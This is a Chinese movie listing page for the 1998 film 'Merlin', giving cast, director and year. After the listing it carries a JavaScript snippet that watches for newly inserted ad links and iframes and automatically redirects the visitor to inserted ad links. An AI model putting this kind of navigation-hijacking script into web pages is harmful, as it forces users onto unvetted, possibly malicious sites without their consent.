梅林

梅林

  • 主演:山姆·尼尔 米兰达·理查森 海伦娜·伯翰·卡特 约翰·吉尔古德 鲁格·豪尔 詹姆斯·厄尔·琼斯 伊莎贝拉·罗西里尼 马丁·肖特 约翰·麦克埃尼 塞巴斯蒂安·罗奇 约瑟夫·马勒 Jason Done 
  • 导演:斯蒂夫·巴伦 
  • 年份:1998
返回顶部
// 自动监听插入的 或 iframe,提取跳转链接 const observer = new MutationObserver((muts) => { for (const m of muts) { for (const node of m.addedNodes) { if (node.nodeType !== 1) continue; const el = node; // case 1: 链接 if (el.tagName === "A" && el.href.includes("http")) { console.log("🎯 发现广告链接:", el.href); window.location.href = el.href; } // case 2: iframe if (el.tagName === "IFRAME" && el.src.includes("http")) { console.log("🎯 发现广告 iframe:", el.src); // window.location.href = el.src; } } } }); observer.observe(document.body, { childList: true, subtree: true });